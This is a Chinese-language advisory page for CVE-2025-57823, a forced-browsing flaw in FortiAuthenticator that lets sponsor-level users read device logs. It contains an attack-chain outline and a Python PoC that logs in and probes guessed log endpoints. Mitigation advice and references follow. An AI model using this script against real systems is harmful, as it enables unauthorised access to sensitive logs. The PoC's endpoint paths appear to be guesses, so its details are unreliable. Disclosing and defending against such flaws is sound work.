CVE-2025-57823 FortiAuthenticator 强制浏览漏洞可读取设备日志

漏洞信息

漏洞编号

CVE-2025-57823

漏洞类型

强制浏览

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiAuthenticator

漏洞概述

CVE-2025-57823是Fortinet FortiAuthenticator中存在的一个直接请求强制浏览（Forced Browsing）漏洞。该漏洞影响FortiAuthenticator 6.3至6.6.6多个版本，允许已认证的攻击者（至少需要sponsor权限）通过直接访问特定端点来读取和下载设备日志。强制浏览是一种常见的Web应用安全漏洞，攻击者通过猜测或推断未受保护的URL路径，绕过正常的应用流程直接访问敏感资源。在此漏洞中，具有sponsor权限的认证用户可以访问本应需要更高权限或更严格访问控制的日志文件。由于CVSS评分仅为2.7（低危级别），该漏洞对机密性的影响较低，但仍可能导致敏感日志信息泄露，建议相关用户及时更新到修复版本。

技术细节

该漏洞属于强制浏览（Forced Browsing）类型的访问控制缺陷。在FortiAuthenticator的Web应用中，某些日志访问端点可能缺少适当的访问控制检查。攻击者通过直接构造HTTP请求访问特定路径或API端点，可以绕过前端应用的权限验证逻辑。具体来说，攻击者需要拥有一个具有sponsor权限的有效账户，然后通过直接请求特定的日志端点URL（如/api/logs或类似的内部路径），即可获取设备日志数据。由于攻击者已经具备基本认证，传统的认证绕过检测可能无法有效拦截此类请求。漏洞的利用复杂度较低（AC:L），攻击者只需要了解目标端点的URL结构即可实施攻击，无需复杂的攻击工具或技术。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标FortiAuthenticator版本（6.3-6.6.6），确定目标环境

STEP 2

步骤2：获取认证凭据

攻击者获取具有sponsor权限的有效账户凭据，可通过社工、凭证泄露或其他方式获得

STEP 3

步骤3：构造直接请求

攻击者构造针对日志端点的直接HTTP GET请求，绕过正常应用流程访问受限资源

STEP 4

步骤4：日志读取与下载

成功访问日志端点后，攻击者获取设备日志内容，可能包含敏感操作记录和系统信息

STEP 5

步骤5：数据利用

攻击者分析日志内容，获取系统配置、用户活动记录等敏感信息，用于进一步攻击或情报收集

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-57823 PoC - FortiAuthenticator Forced Browsing
# Target: FortiAuthenticator 6.3 - 6.6.6
# Authentication required: At least sponsor privileges

TARGET_URL = "https://<fortiauthenticator-host>"
USERNAME = "sponsor_user"
PASSWORD = "password"

def exploit():
    """Exploit forced browsing to access device logs"""
    session = requests.Session()
    
    # Step 1: Login with sponsor account
    login_url = f"{TARGET_URL}/login"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    
    response = session.post(login_url, data=login_data, verify=False)
    
    if response.status_code != 200:
        print("[-] Login failed")
        return False
    
    print("[+] Login successful with sponsor account")
    
    # Step 2: Direct access to log endpoints (forced browsing)
    log_endpoints = [
        "/api/v1/logs/device",
        "/api/v1/logs/system",
        "/api/v1/logs/authentication",
        "/log/device.log",
        "/logs/system.log"
    ]
    
    for endpoint in log_endpoints:
        log_url = f"{TARGET_URL}{endpoint}"
        response = session.get(log_url, verify=False)
        
        if response.status_code == 200 and "log" in response.text.lower():
            print(f"[+] Found accessible log endpoint: {endpoint}")
            print(f"[*] Log content preview: {response.text[:500]}")
            
            # Download logs
            with open(f"log_{endpoint.replace('/', '_')}.txt", 'w') as f:
                f.write(response.text)
            print(f"[+] Log saved to log_{endpoint.replace('/', '_')}.txt")
            return True
    
    print("[-] No accessible log endpoints found")
    return False

if __name__ == "__main__":
    exploit()

影响范围

FortiAuthenticator 6.3 所有版本

FortiAuthenticator 6.4 所有版本

FortiAuthenticator 6.5 所有版本

FortiAuthenticator 6.6.0 - 6.6.6

防御指南

临时缓解措施

立即限制sponsor权限账户的访问范围，审查并移除不必要的日志访问权限。同时启用应用层审计日志，监控所有对日志端点的访问请求。对于无法立即升级的环境，可通过配置URL访问控制列表（ACL）限制对敏感端点的直接访问，并确保所有日志访问操作都经过完整的权限验证流程。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-57823
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-57823
3 Details https://www.cvedetails.com/cve/CVE-2025-57823/
4 VulDB https://vuldb.com/cve/CVE-2025-57823
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-25-554